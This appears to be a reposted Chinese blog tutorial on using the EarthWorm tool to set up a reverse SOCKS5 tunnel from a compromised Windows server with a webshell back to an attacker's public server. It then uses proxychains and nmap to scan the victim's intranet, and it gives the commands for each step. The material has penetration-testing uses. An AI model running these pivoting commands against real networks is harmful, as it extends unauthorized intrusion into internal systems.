最新公告
  • 欢迎您光临,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入我们
  • 通过EW做socks5代理进行内网穿透

    最近搞站的时候有内网穿透的需求,大佬向我推荐了EW,本文模拟一个攻击场景对Earthworm的使用方法做一个简单的介绍。
    其实相应的内容EW的官网已经说得很详细了,我这里纯粹是作为个人笔记从如下几个方面做一个简单的记录:

    1、如何使用EW做反向Socks5代理

    2、浏览器如何设置Socks5代理访问目标内网Web服务

    3、利用proxychains给终端设置Socks5代理(方便将本地命令行工具的流量代理进目标内网)

    Kali Linux(Attacker 内网 192.168.40.135)

    Ubuntu 16.04.3(Attacker 公网 http://120.xxxx.xxx.xxx)

    Windows Server 2008(Victim 目标内网 http://10.xxxx.xxx.xxx)

    网络拓扑:Kali Linux是我本地的一台虚拟机,Ubuntu是公网上的一台ECS,Windows Server 2008是目标机器,内网IP,部分端口映射到外网。

    此处应该有一个拓扑图,等我之后学习下Visio,在把图补充上来23333

    我们现在已拿到目标内网一台机器的权限(该机器将80端口映射至外网,Web服务存在漏洞,已拿到webshell)。需要对内网做进一步的渗透,目前我有一台公网的Ubuntu,一台内网的Kali,如何反向Socks5将Kali的流量代理进目标内网?

    使用EW做反向Socks5代理
    这里我仅演示通过EW做反向Socks5代理,正向、多级级联的的代理方式可以参考官方文档。

    第1步:在公网的Ubuntu上执行如下命令:
    ./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &

    该命令的意思是说公网机器监听1080和1024端口。等待攻击者机器访问1080端口,目标机器访问1024端口。

    第2步:目标机器执行如下命令:
    ew_for_Win.exe -s rssocks -d 120.xxx.xxx.xx -e 1024

    其中-d参数的值为刚刚的公网IP

    第3步:攻击者机器通过proxychains或浏览器设置Socks5代理访问目标内网服务

    浏览器设置Socks5代理
    设置完毕后点击确定即可。此时已可以通过浏览器访问目标内网的Web服务。

    第1步:下载及安装proxychains
    http://www.iyuji.cn/iyuji/s/UDY2Y2lWOW9VV2dkcmh0a25XbjRldz09/1592069546328514

    第2步:编辑proxychains配置文件设置代理
    http://www.iyuji.cn/iyuji/s/UDY2Y2lWOW9VV2dkcmh0a25XbjRldz09/1592069580110457

    第3步:举个栗子:使用proxychains nmap对目标内网扫描

    设置完成后即可使用类似proxychains nmap 192.168.40.133这种方式将nmap的流量代理至目标内网进行扫描,其他命令行工具同理。

    后记
    在使用的过程中也出现了一些问题,有的工具流量不走sock5代理,就很尴尬,具体原因不详。有点困了,回家睡觉,剩下的问题明天再解决。身体是革命的本钱。

    希望对这方面内容感兴趣的同学偶然看到了这篇文章能有所收获吧,当然,如有谬误还请不吝赐教。

    请在后台主题设置-主题授权-激活RiPro主题的正版授权,授权购买:RiTheme官网
    1. 本站所有资源来源于用户上传和网络,因此不包含技术服务请大家谅解!
    2.如有侵权请邮件联系客服!l联系邮箱:***@qq.com
    3. 本站不保证所提供下载的资源的准确性、安全性和完整性
    4.资源仅供下载学习之用!如有链接无法下载、失效或广告,请联系客服处理!
    5. 如用于商业或者非法用途,与本站无关,一切后果请用户自负!
    6. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
    7. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
    8. 如遇到加密压缩包,默认解压密码为"www。loveu8.cn",如遇到无法解压的请联系客服!
    9. 如果您也有好的资源或教程,您可以投稿发布,成功分享后有站币奖励和额外收入!
    幻梦资源网 » 通过EW做socks5代理进行内网穿透

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    幻梦资源网
    一个高级程序员模板开发平台